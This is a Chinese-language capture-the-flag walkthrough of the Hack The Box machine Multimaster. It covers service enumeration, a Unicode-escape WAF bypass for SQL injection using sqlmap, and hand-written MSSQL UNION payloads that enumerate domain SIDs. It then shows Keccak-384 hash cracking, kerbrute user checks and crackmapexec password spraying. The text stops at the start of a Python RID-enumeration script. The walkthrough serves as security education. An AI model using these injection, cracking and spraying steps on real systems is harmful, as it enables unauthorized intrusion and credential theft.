title: Hack The Box - Multimaster(Active Directory曲目压箱底) author: World'sEnd layout: true categories: 内网安全 tags:
• 打靶日记
No matter how many mistakes you make or how slow you progress, you are still way ahead of everyone who isn't trying.
无论你犯了多少错,或者你进步得有多慢,你都走在了那些不曾尝试的人的前面。
Hack The Box - Multimaster
这是Active Directory 101曲目中的最后一台靶机了,也是我HTB会员最后一天了。短期应该不会再更新打靶日记了,虽然打靶确实很爽,渐渐的,我发现我迷恋上了那种通过一次一次枚举去探索发掘目标安全隐患的感觉,因为在这个过程中,我的好奇心会被不断的满足。
# Nmap 7.92 scan initiated Mon Apr 25 09:29:22 2022 as: nmap -sV -sC -p- -Pn -T4 -oA nmap.txt 10.10.10.179
Nmap scan report for 10.10.10.179
Host is up (0.16s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: MegaCorp
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-25 01:42:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGACORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-04-25T01:43:41+00:00; +7m00s from scanner time.
| rdp-ntlm-info:
| Target_Name: MEGACORP
| NetBIOS_Domain_Name: MEGACORP
| NetBIOS_Computer_Name: MULTIMASTER
| DNS_Domain_Name: MEGACORP.LOCAL
| DNS_Computer_Name: MULTIMASTER.MEGACORP.LOCAL
| DNS_Tree_Name: MEGACORP.LOCAL
| Product_Version: 10.0.14393
|_ System_Time: 2022-04-25T01:43:04+00:00
| ssl-cert: Subject: commonName=MULTIMASTER.MEGACORP.LOCAL
| Not valid before: 2022-04-24T01:34:46
|_Not valid after: 2022-10-24T01:34:46
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MULTIMASTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h31m00s, deviation: 3h07m51s, median: 6m59s
| smb2-time:
| date: 2022-04-25T01:43:06
|_ start_date: 2022-04-25T01:34:52
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: MULTIMASTER
| NetBIOS computer name: MULTIMASTER\x00
| Domain name: MEGACORP.LOCAL
| Forest name: MEGACORP.LOCAL
| FQDN: MULTIMASTER.MEGACORP.LOCAL
|_ System time: 2022-04-24T18:43:04-07:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 25 09:36:49 2022 -- 1 IP address (1 host up) scanned in 447.01 secondsNmap为我枚举了不少的信息。
OS:Windows Server 2016
Domain name: MEGACORP.LOCAL
Forest name: MEGACORP.LOCALDNS:
尝试区域传输:
$ dig axfr @10.10.10.179 MEGACORP.LOCAL
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.179 MEGACORP.LOCAL
; (1 server found)
;; global options: +cmd
; Transfer failed.或许它对我骇入目标不会有多大用,但我就是想单纯的看它如果成功一次我能获取到多少东西。
HTTP:
目标机器名为Multimaster,那它对应的域名应该是multimaster.htb,虽然访问IP也可以,但有时候会错过一些东西:
80端口很是壮观,不过都是假的。鼠标移动上去只是改变了一下样式会被误认为可以点击,但他只是改变了鼠标样式,甚至连个锚点都不会跳转。画廊也是假的:
当我点击同事查找器时,我看到了一个输入框,我会很高兴,或许我能枚举用户名:
如果我输入一些东西,它不会返回任何结果给我,甚至都不愿意告诉我有没有这个同事,但是如果我什么都不输入就敲击回车:
它就会返回与我很多同事信息,我获取到了一个潜在的用户名字典:
sbauer@megacorp.htb
okent@megacorp.htb
ckane@megacorp.htb
kpage@megacorp.htb
shayna@megacorp.htb
james@megacorp.htb
cyork@megacorp.htb
rmartin@megacorp.htb
zac@magacorp.htb
jorden@megacorp.htb
alyx@megacorp.htb
ilee@megacorp.htb
nbourne@megacorp.htb
zpowers@megacorp.htb
aldom@megacorp.htb
minato@megacorp.htb
egre55@megacorp.htb当我复制到最后一个用户名时,它很奇怪,因为它让我看起来很可疑:
我以为是前辈留下的痕迹,但是我重置了机器以后,它还在,看起来这是目标本身包含的部分。还有一个登录框,但是如果我点击登录,它不会发起任何请求:
即使右键检查元素,也只是一个单纯的文本框,它并不会提交到任何地方,或许我可以手动为其添加一些元素,但是我当下不知道后端会有哪些响应我。我应该将数据提交到什么文件,对于当下 的我来说,像大海捞针。看起来唯一能让我与目标交互的地方就在同事查找器。我可以尝试对目标进行路径爆破:
[10:26:41] 403 - 1KB - /.well-known/host-meta.json
[10:26:41] 403 - 1KB - /.well-known/jwks
[10:26:41] 403 - 1KB - /.well-known/hoba
[10:26:41] 403 - 1KB - /.well-known/jwks.json
[10:26:41] 403 - 1KB - /.well-known/keybase.txt
[10:26:41] 403 - 1KB - /.well-known/host-meta
[10:26:41] 403 - 1KB - /.well-known/ni
[10:26:41] 403 - 1KB - /.well-known/reload-config
[10:26:41] 403 - 1KB - /.well-known/openid-configuration
[10:26:41] 403 - 1KB - /.well-known/posh
[10:26:41] 403 - 1KB - /.well-known/openorg
[10:26:41] 403 - 1KB - /.well-known/security.txt
[10:26:41] 403 - 1KB - /.well-known/repute-template
[10:26:41] 403 - 1KB - /.well-known/stun-key
[10:26:41] 403 - 1KB - /.well-known/timezone它会返回给我一大堆403,看起来目标会存在WAF。我可以识别一下它是什么WAF:
但我并没有在页面中找到任何WAF特征,请求头中没有,右键源代码也没有,错误信息中也没有。获取我可以通过其他工具识别:
$ wafw00f http://multimaster.htb -a
______
/ \
( Woof! )
\ ____/ )
,, ) (_
.-. - _______ ( |__|
()``; |==|_______) .)|__|
/ (' /|\ ( |__|
( / ) / | \ . |__|
\(_)_)) / | \ |__|
~ WAFW00F : v2.1.0 ~
The Web Application Firewall Fingerprinting Toolkit
[*] Checking http://multimaster.htb
[+] Generic Detection results:
[-] No WAF detected by the generic detection
[~] Number of requests: 7工具识别不出来。看起来同事查找器会是一个突破点,或许我应该从那里测试就能得到一些WAF的信息,又或者我可以增加个延时,但是我不准备现在就那么做,会很慢,比如我可以爆破IP:
[10:28:41] 403 - 1KB - /.env.development.local
[10:28:41] 403 - 1KB - /.env-sample
[10:28:41] 403 - 1KB - /.env.dev
[10:28:41] 403 - 1KB - /.env.dev.local
[10:28:41] 403 - 1KB - /.env.docker
[10:28:41] 403 - 1KB - /.env
[10:28:41] 403 - 1KB - /.env.backup
[10:28:41] 403 - 1KB - /.env.dist
[10:28:41] 403 - 1KB - /.ensime_lucene/
[10:28:41] 403 - 1KB - /.env.docker.dev
[10:28:41] 403 - 1KB - /.env.development.sample
[10:28:41] 403 - 1KB - /.env.example
我会记住这里,因为我还能够看很多东西,当下没必要跟WAF较劲。
RPC:
RPC并不允许匿名访问:
$ rpcclient -U "" 10.10.10.179
Enter WORKGROUP\'s password:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURELDAP:
$ ldapsearch -x -b "dc=MEGACORP.LOCAL" -H ldap://10.10.10.179 > ldap.txt
$ cat ldap.txt
# extended LDIF
#
# LDAPv3
# base with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
# numResponses: 1 LDAP也失败了,它似乎要求我提供一个合法的账户凭证。
SMB:
$ smbmap -H 10.10.10.179 -u whoami
[!] Authentication error on 10.10.10.179SMB也不允许匿名访问。
SQL注入:
好吧,看起来路线很明白了,我需要从80端口的同事查找器入手,如果我直接按回车提交我会得到这样一个数据包,我提交的话服务端也会返回给我一个数据包:
当我输入一个null时,服务器会返回给我一个正常的数据包,但没有内容:
但是当我提交单引号时,服务器会报错:
但是并没有过多的WAF信息,如果我能知道是什么WAF,我可以去搜索相关绕过文章,或是它的产品资料介绍文档,如果能免费下载试用我可以本地搭建测试其拦截规则,但是当下我对于目标WAF一无所知,甚至我都不知道它是站点源码中的脚本WAF还是第三方应用WAF程序系统。那么我可以用最古老最朴素最笨的办法,我可以先对特殊字符爆破一次,确定它会拦截我什么,不拦截我什么:
它拦截的也不多,就四个符号:\ # 与单双引号。而在数据包中还会指定编码格式,或许我提交,后端会存在某种东西将我提交的参数自动解码:
Content-Type: application/json;charset=utf-8WAF的拦截规则不管是正则、特征库、黑白名单,它们最底层最本质的,都是黑名单。但是始终有一个缺陷是无法解决的,在WAF设计者编辑最初的WAF规则时,可能是他一时粗心,但更多的是他无法预料到他设计的WAF具体会被用在什么领域,什么范围,什么特征的站点,需要什么防护,所以在拦截规则方面除了已公开的特征库之外,他无法去自定义的遐想内置启用更多的拦截规则,所以通常只会内置一些最基本的例如我所提交的 # \ 与单双引号列入黑名单。然后他会选择开放一个功能入口,让用户去自定义的添加。脚本型WAF,可以更改对应的源码,软件型或硬件型WAF,都会有一个自定义的功能模块。但是,很多用户都是购买之后开箱即用,只要没影响业务正常,很少会有人对规则再做一些自定义更改。
所以我可以试试将我的这些符号进行编码,因为我通过BURPSUITE测试时,并没有指定该字符集编码,或许目标就是我所说的那样,它确实对特殊符号进行了拦截,但是能表示这种符号的很多很多,例如编码。当然编码也不应该随便编,也许毫无头绪时可以试试。但是这次,我觉得我可以先顺着它指定的编码charset=utf-8对去尝试一下。而且它看起来像是在查询什么数据,或许会涉及到SQL注入,SQL注入中常用的判断符号便是引号,我可以先尝试一下单引号,我将单引号进行Unicode编码,它是\u0027:
这次它没有报错,而我也可以确定,这里是存在漏洞的。只要我构造适当的语句。因为它要涉及到不断的编码,我可以将数据包保存下来交给SQLMAP:
$ cat exp.txt
POST /api/getColleagues HTTP/1.1
Host: multimaster.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 173
Origin: http://multimaster.htb
DNT: 1
Connection: close
Referer: http://multimaster.htb/
{"name":"*"}$ sqlmap -r exp.txt --tamper=charunicodeescape --delay 5 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080
___
__H__
___ ___["]_____ ___ ___ {1.6.4#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:01:33 /2022-04-25/
--tamper=charunicodeescape:我需要SQLMAP每次执行时都将其载荷进行Unicode编码,很高兴SQLMAP内置的charunicodeescape可以帮助我自动做到这一点。
--delay 5:我指定为每过五秒一个请求,因为我觉得如果存在WAF,CC防护是最基本的功能,更何况目标是一台内网域服务器,他本就不会在很短时间内被访问多次,如果目标中有安全管理员,他可能会将频率控制到不影响他们内网正常使用,但又能抵御恶意枚举访问。我觉得五秒一个请求应该可以。
--level 5:等级,如果没被WAF拦截,但是因为测试级别低而没枚举出来,那不是很可惜。
--risk 3 : 风险等级,会添加OR语句。或许为此我能遍历出数据库更多的信息。
--batch:对于凡是需要我选择的,一律选择默认答案。例如它经常要求我输入的”Y“。
--proxy:指定BURPSUITE监听端口,因为这样当SQLMAP命令界面没反应时,我可以通过BURPSUITE去确定是否被WAF拦截或是另外的一些问题。
可以看到SQLMAP为我枚举出了很多东西,而且SQLMAP已经正常执行完,没有报错信息。意味着我已经获取到了目标数据库信息,我比较简单粗暴,因为它毕竟是个靶场,我没有心理压力:
$ sqlmap -r exp.txt --tamper=charunicodeescape --delay 5 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dump-all --exclude-sysdbs我可以获取到目标内部员工信息,他们的邮箱,他们的名字,他们的岗位:
还有他们的密码,是以哈希存储的:
而且他们的哈希看起来是一样的。只有这四串,可能作者不想让我花费更多的功夫,意思一下:
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc我可以通过john进行破解,因为我不知道它是基于什么加密的,而john会自动帮我检测:
$ john -w=/usr/share/wordlists/rockyou.txt --fork=4 ./hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA384 [SHA384 256/256 AVX2 4x])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
2 0g 0:00:00:00 DONE (2022-04-25 13:43) 0g/s 5878Kp/s 5878Kc/s 5878KC/s !SHOPING!.abygurl69
3 0g 0:00:00:00 DONE (2022-04-25 13:43) 0g/s 5691Kp/s 5691Kc/s 5691KC/s !Sacramento1.a6_123
4 0g 0:00:00:00 DONE (2022-04-25 13:43) 0g/s 5516Kp/s 5516Kc/s 5516KC/s !SBERGHOEFER1..*7¡Vamos!
1 0g 0:00:00:00 DONE (2022-04-25 13:43) 0g/s 5603Kp/s 5603Kc/s 5603KC/s !TEXas!76542.ie168
Waiting for 3 children to terminate
Session completed. 但是似乎不对劲,john可以告诉我是SHA384哈希,但是它猜解不出来。我可以尝试hashcat:
$ hashcat -h | grep "SHA384"
26900 | SNMPv3 HMAC-SHA384-256 | Network Protocol
$ hashcat -a 0 -m 26900 --force ./hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 2904/5872 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 256
Hashfile './hash.txt' on line 1 (977776...8d97be2d20d79dbccbe242c2244e5739): Separator unmatched
Hashfile './hash.txt' on line 2 (fb4064...fc80dd2928e648465b8e7a1946a50cfa): Separator unmatched
Hashfile './hash.txt' on line 3 (68d105...1201fbacc3edb639eed4e954ce5f0813): Separator unmatched
Hashfile './hash.txt' on line 4 (cf17bb...dd986b64bf715d0a2df0015fd090babc): Separator unmatched
No hashes loaded.但是hashcat似乎识别SHA384失败了,难道是SQLMAP为我返回数据的时候被编码出错了么?我试着去尝试SHA其他方法,都没成功,我尝试搜索hashcat 384中的其他算法:
$ hashcat -h | grep "384"
10800 | SHA2-384 | Raw Hash
17500 | SHA3-384 | Raw Hash
17900 | Keccak-384 | Raw Hash
10870 | sha384(utf16le($pass)) | Raw Hash
10810 | sha384($pass.$salt) | Raw Hash salted and/or iterated
10820 | sha384($salt.$pass) | Raw Hash salted and/or iterated
10840 | sha384($salt.utf16le($pass)) | Raw Hash salted and/or iterated
10830 | sha384(utf16le($pass).$salt) | Raw Hash salted and/or iterated
26900 | SNMPv3 HMAC-SHA384-256 | Network Protocol
27300 | SNMPv3 HMAC-SHA512-384 | Network Protocol我通过Keccak-384 破解成功了,看起来是成功了:
$ hashcat -a 0 -m 17900 --force ./hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 2904/5872 MB (1024 MB allocatable), 4MCU
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739:password1
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813:finance1
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa:banking1如此弱口令,作者真的不怕被小心弱口令爆破出来么?但还是有一个哈希因为不知名原因没被hashcat识别出,但是不重要,我可以将密码提取做成字典:
password1
finance1
banking1我可以执行密码喷涂去验证一下这些口令能否让我登录到目标,这些密码对应的是哪些用户,因为他们的哈希都一样的,除了两位CEO的哈希被丢掉了,首先我可以确定一下用户名是否真的存在:
$ ./kerbrute userenum -d MEGACORP.LOCAL ../user.txt --dc 10.10.10.179
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/25/22 - Ronnie Flathers @ropnop
2022/04/25 14:01:40 > Using KDC(s):
2022/04/25 14:01:40 > 10.10.10.179:88
2022/04/25 14:01:41 > [+] VALID USERNAME: ckane@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: okent@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: james@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: sbauer@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: kpage@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: cyork@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: rmartin@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: zac@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: jorden@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: alyx@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: ilee@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: aldom@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: zpowers@MEGACORP.LOCAL
2022/04/25 14:01:41 > [+] VALID USERNAME: nbourne@MEGACORP.LOCAL
2022/04/25 14:01:41 > Done! Tested 17 usernames (14 valid) in 0.760 seconds
然后我可以进行密码喷涂:
$ crackmapexec smb 10.10.10.179 -u ./users.txt -p passwd.txt --continue-on-success
SMB 10.10.10.179 445 MULTIMASTER [*] Windows Server 2016 Standard 14393 x64 (name:MULTIMASTER) (domain:MEGACORP.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\./users.txt:password1 STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\./users.txt:finance1 STATUS_LOGON_FAILURE
SMB 10.10.10.179 445 MULTIMASTER [-] MEGACORP.LOCAL\./users.txt:banking1 STATUS_LOGON_FAILURE但是都失败了,我思来想去,问题可能还是出在WAF上,因为当下我只能在80端口通过SQL注入获取更多的信息。或许WAF还是拦截掉了某些信息。要么我用户名少了,要么我密码少了。我准备重新去跑一遍SQLMAP,或许每五秒一次还是太快了。这次我手动一层层通过SQLMAP在里边搜寻,我发现还是这些信息:
Windows 安全标识符:
或许我应该手工慢慢找,我复制SQLMAP的一条查询语句,我想看看它查询了什么:
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: {"name":"-3202' UNION ALL SELECT 86,86,86,86,CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(100)+CHAR(120)+CHAR(69)+CHAR(70)+CHAR(119)+CHAR(104)+CHAR(75)+CHAR(117)+CHAR(113)+CHAR(114)+CHAR(116)+CHAR(108)+CHAR(106)+CHAR(114)+CHAR(119)+CHAR(110)+CHAR(115)+CHAR(82)+CHAR(99)+CHAR(98)+CHAR(111)+CHAR(113)+CHAR(119)+CHAR(66)+CHAR(78)+CHAR(112)+CHAR(83)+CHAR(109)+CHAR(80)+CHAR(72)+CHAR(88)+CHAR(90)+CHAR(71)+CHAR(116)+CHAR(112)+CHAR(74)+CHAR(78)+CHAR(85)+CHAR(77)+CHAR(82)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(113)-- ECes"}他在86位置有回显,src我不知道是什么数据:
我可以尝试在email字段回显,我可以通过DEFAULT_DOMAIN()函数查看当前域:
-3202' UNION ALL SELECT 86,86,86,DEFAULT_DOMAIN(),CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(100)+CHAR(120)+CHAR(69)+CHAR(70)+CHAR(119)+CHAR(104)+CHAR(75)+CHAR(117)+CHAR(113)+CHAR(114)+CHAR(116)+CHAR(108)+CHAR(106)+CHAR(114)+CHAR(119)+CHAR(110)+CHAR(115)+CHAR(82)+CHAR(99)+CHAR(98)+CHAR(111)+CHAR(113)+CHAR(119)+CHAR(66)+CHAR(78)+CHAR(112)+CHAR(83)+CHAR(109)+CHAR(80)+CHAR(72)+CHAR(88)+CHAR(90)+CHAR(71)+CHAR(116)+CHAR(112)+CHAR(74)+CHAR(78)+CHAR(85)+CHAR(77)+CHAR(82)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(113)-- ECes
我可以通过SUSER_SID()函数来获取域内的安全标识符,关于安全标识符更多的信息微软官方有说明:
https://docs.microsoft.com/zh-cn/windows/security/identity-protection/access-control/security-identifiers我无法通过SUSER_SID()函数直接获取域的安全标识符,但是windows的域内会有一些默认组,例如Domain Admins:
-3202' UNION ALL SELECT 86,86,86,SUSER_SID('MEGACORP\Domain Admins'),CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(100)+CHAR(120)+CHAR(69)+CHAR(70)+CHAR(119)+CHAR(104)+CHAR(75)+CHAR(117)+CHAR(113)+CHAR(114)+CHAR(116)+CHAR(108)+CHAR(106)+CHAR(114)+CHAR(119)+CHAR(110)+CHAR(115)+CHAR(82)+CHAR(99)+CHAR(98)+CHAR(111)+CHAR(113)+CHAR(119)+CHAR(66)+CHAR(78)+CHAR(112)+CHAR(83)+CHAR(109)+CHAR(80)+CHAR(72)+CHAR(88)+CHAR(90)+CHAR(71)+CHAR(116)+CHAR(112)+CHAR(74)+CHAR(78)+CHAR(85)+CHAR(77)+CHAR(82)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(113)-- ECes
确实能查到,但是貌似编码不一样,或许我该找找MSSQL中有没有什么函数可以转换编码类型,比如转换成十六进制,在这个网址:
https://stackoverflow.com/questions/703019/convert-integer-to-hex-and-hex-to-integer我发现了这一段:
-3202' UNION ALL SELECT 86,86,86,master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\Domain Admins')),CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(100)+CHAR(120)+CHAR(69)+CHAR(70)+CHAR(119)+CHAR(104)+CHAR(75)+CHAR(117)+CHAR(113)+CHAR(114)+CHAR(116)+CHAR(108)+CHAR(106)+CHAR(114)+CHAR(119)+CHAR(110)+CHAR(115)+CHAR(82)+CHAR(99)+CHAR(98)+CHAR(111)+CHAR(113)+CHAR(119)+CHAR(66)+CHAR(78)+CHAR(112)+CHAR(83)+CHAR(109)+CHAR(80)+CHAR(72)+CHAR(88)+CHAR(90)+CHAR(71)+CHAR(116)+CHAR(112)+CHAR(74)+CHAR(78)+CHAR(85)+CHAR(77)+CHAR(82)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(113)-- ECes
这次看起来正常了。Domain Admins的安全标识符是这样的:
0x0105000000000005150000001c00d1bcd181f1492bdfc23600020000一个安全标识符是由SID与RID拼接起来的,RID的样子就是我之前的文章中有通过RPC枚举到的rid。为了更直观的表述,我可以再查询Domain Users组的安全标识符:
-3202' UNION ALL SELECT 86,86,86,master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\Domain Users')),CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(100)+CHAR(120)+CHAR(69)+CHAR(70)+CHAR(119)+CHAR(104)+CHAR(75)+CHAR(117)+CHAR(113)+CHAR(114)+CHAR(116)+CHAR(108)+CHAR(106)+CHAR(114)+CHAR(119)+CHAR(110)+CHAR(115)+CHAR(82)+CHAR(99)+CHAR(98)+CHAR(111)+CHAR(113)+CHAR(119)+CHAR(66)+CHAR(78)+CHAR(112)+CHAR(83)+CHAR(109)+CHAR(80)+CHAR(72)+CHAR(88)+CHAR(90)+CHAR(71)+CHAR(116)+CHAR(112)+CHAR(74)+CHAR(78)+CHAR(85)+CHAR(77)+CHAR(82)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(113)-- ECes
我可以将两串安全标识符放在一起做对比:
0x0105000000000005150000001c00d1bcd181f1492bdfc23600020000 #Domain Admins
0x0105000000000005150000001c00d1bcd181f1492bdfc23601020000 #Domain Users相信可以一眼就看出安全标识符有哪些不同,所以我可以锁定以下是该域的SID主体,而后边8位就是对象自己的RID:
0x0105000000000005150000001c00d1bcd181f1492bdfc236 #SID
01020000 #RID我只需要枚举后边的八位即可。关于后边如何枚举,我可以再做个演示,例如我枚举administrator用户的安全标识符:
-3202' UNION ALL SELECT 86,86,86,master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\administrator')),CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(100)+CHAR(120)+CHAR(69)+CHAR(70)+CHAR(119)+CHAR(104)+CHAR(75)+CHAR(117)+CHAR(113)+CHAR(114)+CHAR(116)+CHAR(108)+CHAR(106)+CHAR(114)+CHAR(119)+CHAR(110)+CHAR(115)+CHAR(82)+CHAR(99)+CHAR(98)+CHAR(111)+CHAR(113)+CHAR(119)+CHAR(66)+CHAR(78)+CHAR(112)+CHAR(83)+CHAR(109)+CHAR(80)+CHAR(72)+CHAR(88)+CHAR(90)+CHAR(71)+CHAR(116)+CHAR(112)+CHAR(74)+CHAR(78)+CHAR(85)+CHAR(77)+CHAR(82)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(113)-- ECes
它的SID与RID是这样的:
0x0105000000000005150000001c00d1bcd181f1492bdfc236 f4010000而windows中Administrator用户的RID是500,500的十六进制为:0x1f4,将其补充为8位即 0x000001f4,如果我将其高低位反转一下:
0x000001f4
反转
0xf4010000相信能够一眼看出其中所以然。
通过Windows 安全标识符枚举新用户:
在MSSQL中还有SUSER_SNAME()函数,它可以通过安全标识符返回对应的用户名,burpsuite不知道为何做不了这个操作,理论上来是可以,但我不知道它哪里搞错了,我反复确认了我的攻击向量并没有添加错,字典也正确,但就是无法使用。这是一位以前打过这台机器的前辈0xdf的脚本连接,而它当时碰到的问题跟我当下一样,
https://0xdf.gitlab.io/2020/09/19/htb-multimaster.html#dump-domain-userswindows的RID是从500开始的,500也正是管理员,然后活动目录中的每一个组,用户,系统都会为其生成一个RID,已知RID:指派给用户、计算机和组的RID从1000开始。500-999的RID被专门保留起来、表示在每个Windows计算机和域中通用的账户和组。而我可以看一眼我已经拥有的用户名,它们的RID是从哪里开始的,比如:
sbauer:0xc1e 3102
minato 用户没有
aldom: 0xc2b 3115我可以从3115开始枚举:
#!/usr/bin/env python3
import binascii
import requests
import struct
import sys
import time
#payload 我还是拿的SQLMAP那条payload
